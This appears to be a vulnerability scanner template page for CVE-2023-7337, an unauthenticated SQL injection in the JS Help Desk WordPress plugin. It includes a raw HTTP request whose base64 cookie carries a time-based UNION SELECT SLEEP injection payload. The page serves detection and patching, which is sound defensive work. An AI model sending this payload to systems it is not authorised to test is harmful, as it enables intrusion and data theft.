JS Help Desk <= 2.8.2 - SQL Injection
CVE-2023-7337
Verified
Description
JS Help Desk WordPress plugin 2.8.2 contains a SQL injection caused by insufficient escaping and preparation of user-supplied values in 'js-support-ticket-token-tkstatus' cookie, letting unauthenticated attackers extract sensitive database information, exploit requires no authentication.
Severity
Critical
CVSS Score
7.5
Exploit Probability
1%
Published Date
March 5, 2026
Template Author
shivam kamboj
CVE-2023-7337.yaml
id: CVE-2023-7337
info:
name: JS Help Desk <= 2.8.2 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
JS Help Desk WordPress plugin 2.8.2 contains a SQL injection caused by insufficient escaping and preparation of user-supplied values in 'js-support-ticket-token-tkstatus' cookie, letting unauthenticated attackers extract sensitive database information, exploit requires no authentication.
impact: |
Unauthenticated attackers can extract sensitive database information, leading to data disclosure.
remediation: |
Update to the latest version of JS Help Desk plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-ai-powered-support-ticketing-system-282-unauthenticated-sql-injection-via-js-support-ticket-token-tkstatus-cookie
- https://nvd.nist.gov/vuln/detail/CVE-2023-7337
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-7337
epss-score: 0.01317
epss-percentile: 0.67293
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket
http:
- raw:
- |
@timeout: 20s
GET /js-support-ticket-controlpanel/?jstmod=ticket&jstlay=ticketdetail&jssupportticketid=1 HTTP/1.1
Host: {{Hostname}}
Cookie: js-support-ticket-token-tkstatus=eyJlbWFpbGFkZHJlc3MiOiJ0ZXN0QHRlc3QuY29tJyBVTklPTiBTRUxFQ1QgU0xFRVAoOCktLSAtIiwidHJhY2tpbmdpZCI6InRlc3QxMjMifQ==
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'contains(body, "JS Help Desk")'
- 'status_code == 200 || status_code == 302'
condition: and
# digest: 4a0a00473045022100f76355735eadebf91cdca433b9cf642da33b66c7c44fbaf24f32c46e2991b5860220145e18f041daa9695a43100052124b2cad66dc1a8b648463b45a6396fb911012:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2023-7337
CWE ID:
cwe-89
Remediation Steps
Update to the latest version of JS Help Desk plugin.